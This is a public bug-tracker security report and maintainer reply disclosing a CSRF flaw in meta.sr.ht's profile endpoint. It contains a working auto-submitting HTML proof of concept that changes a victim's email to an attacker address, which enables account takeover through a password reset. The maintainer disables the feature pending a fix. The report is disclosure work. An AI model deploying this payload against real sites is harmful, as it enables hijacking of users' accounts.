The website is vulnerable to cross-site request forgery (CSRF). Attackers can host the following HTML to force a user into changing their email address to an attacker's email address.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://meta.sr.ht/profile" method="POST"> <input type="hidden" name="email" value="firstname.lastname@example.org" /> <input type="hidden" name="url" value="" /> <input type="hidden" name="location" value="" /> <input type="hidden" name="bio" value="" /> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
Once a user that is logged in visits the page, a POST request is made to modify their email address. The attacker then receives a confirmation email and can now perform a password reset. The request above is just an example, but will apply to any state changing request.
Feel free to ping me if you have any other questions.
Thank you. In the future, send security-related issues as an email, not as a public ticket.
I have disabled this feature in meta.sr.ht in production for now, a proper fix will follow shortly.